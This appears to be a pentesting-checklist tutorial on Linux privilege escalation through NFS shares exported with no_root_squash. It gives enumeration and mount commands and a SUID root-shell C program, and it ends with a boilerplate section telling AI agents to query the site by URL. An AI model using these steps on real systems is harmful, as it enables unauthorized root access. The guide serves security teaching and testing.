# NFS

### Overview

**NFS (Network File System)** allows one Linux machine to share directories with another over the network.

Commonly used for:

* Shared storage
* Backups

### Why this Works

The key issue is a dangerous NFS export option:

```
no_root_squash
```

Normally, NFS applies:

```
root_squash
```

This means:

* If root connects remotely → it is mapped to a low-privileged user (typically `nobody`)
* Prevents remote root from acting as real root on the server

But with `no_root_squash` ,

Remote root = real root on the NFS share.

So if you:

1. Gain root on a client machine
2. Mount the NFS share
3. Create a SUID root binary inside the share

When that binary is executed on the server →\
It runs as **root**.

### Prerequisites

For NFS SUID PrivEsc to work:

* An NFS share is exported with:
  * `rw`
  * `no_root_squash`
* You can mount the share
* You have root access on the client machine
* The mounted directory is accessible on the target system
* SUID bit execution is allowed on the mounted filesystem

### Steps

1. Enumerate NFS Shares:

   ```bash
   # Command to run in Victim machine
   cat /etc/exports
   # Command to run in attacker machine
   showmount -e <VICTIM_IP>
   ```
2. Mount the NFS share:

   ```bash
   mkdir /mnt/nfs
   mount -o rw,vers=3 TARGET_IP:/export /mnt/nfs
   ```
3. Create a simple C file and compile it:

   ```c
   #include <stdio.h>
   #include <stdlib.h>
   #include <unistd.h>

   int main() {
       setuid(0);
       setgid(0);
       system("/bin/bash");
       return 0;
   }
   ```

&#x20;      `gcc shell.c -o shell`

4. Make it a SUID Binary:

   ```bash
   chmod +xs /mnt/nfs/shell.elf
   ```
5. In the victim machine, just execute the elf file:

   ```bash
   /export/shell.elf
   ```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://gokulkarthik.gitbook.io/pentesting-checklist/linux/linux-privilege-escalation/nfs.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.